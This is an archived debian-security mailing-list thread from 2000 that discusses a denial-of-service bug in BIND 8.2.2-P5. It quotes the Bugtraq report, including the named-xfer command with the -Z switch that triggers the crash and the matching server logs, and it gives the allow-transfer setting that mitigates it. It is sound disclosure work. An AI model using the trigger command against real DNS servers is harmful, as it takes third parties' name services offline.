Re: Bind-8.2.2-P5 DOS

To: debian-security@lists.debian.org
Subject: Re: Bind-8.2.2-P5 DOS
From: "Arno Vije | LinuxInfo.nl" <linuxinfo@linuxinfo.nl>
Date: Fri, 10 Nov 2000 23:46:35 +0100 (CET)
Message-id: <[🔎] Pine.LNX.4.21.0011102344460.1578-100000@s01.unitech.nl>
In-reply-to: <[🔎] 00110916031909.02589@jmb>

My hosts only are vulnerable when the allow_transfer { ... }; is not
configured in named.conf .. without it named dies after +- 1 minute, if
defined just an error message in /var/log/daemon ..

Arno Vije

On Thu, 9 Nov 2000, Jean-Marc Boursot wrote:

> 
> Debian 2.2 IS vulnerable to the following DOS reported by Fabio
> Pietrosanti (naif) <fabio@TELEMAIL.IT> in bugtraq:
> 
> <<
> Hi,
> playing with bind and ZXFR feature ( zone transfer compressed with a
> possible insecure execlp("gzip", "gzip", NULL); ), i discovered a
> Denial Of Service against Bind 8.2.2-P5 .
> 
> By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless
> you define it with #define BIND_ZXFR so it will refuse any ZXFR
> transfer, because it doesn't support it. But now what appens? Look
> here...
> 
> ################################
> zone to transfer: zone.pippo.com
> dns server:       dns.pippo.com 192.168.1.1
> me:               naif.gatesux.com 10.10.10.10
> I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR.
> dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone
> could ask him for *.zone.pippo.com ...
> 
> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com  -d 9 -f pics -Z dns.pippo.com
> named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
> 
> On the server's log:
> Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
> Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
> 
> Then the server "*** CRASHED ***" .
> 
> I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos)
> and bind-9.0.0 has no support for ZXFR .
> 
> <naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
>     234
> <naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
>       0
> 
> A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable...
> 
> 
> naif
> naif@itapac.net
> >>
> 
> Here is my daemon.log:
> 
> Nov  9 15:13:19 ns12 named[137]: approved ZXFR from [192.168.1.10].1642 for "domain.org"
> Nov  9 15:13:19 ns12 named[137]: unsupported XFR (type ZXFR) of "domain.org" (IN) to [192.168.1.10].1642
> Nov  9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
> Nov  9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
> 
> And named was down...
> 
> Regards,
> 
> Jean-Marc Boursot
> 
> 
> --  
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>

Reply to:

References:
- Bind-8.2.2-P5 DOS
  - From: Jean-Marc Boursot <jmboursot@evhr.net>

Prev by Date: Re: Impersonating OS
Next by Date: Re: 'Generic' Firewall Rulesets?
Previous by thread: Re: Bind-8.2.2-P5 DOS
Next by thread: Re: [suse-security] gs read shared libraries from working directory ??
Index(es):
- Date
- Thread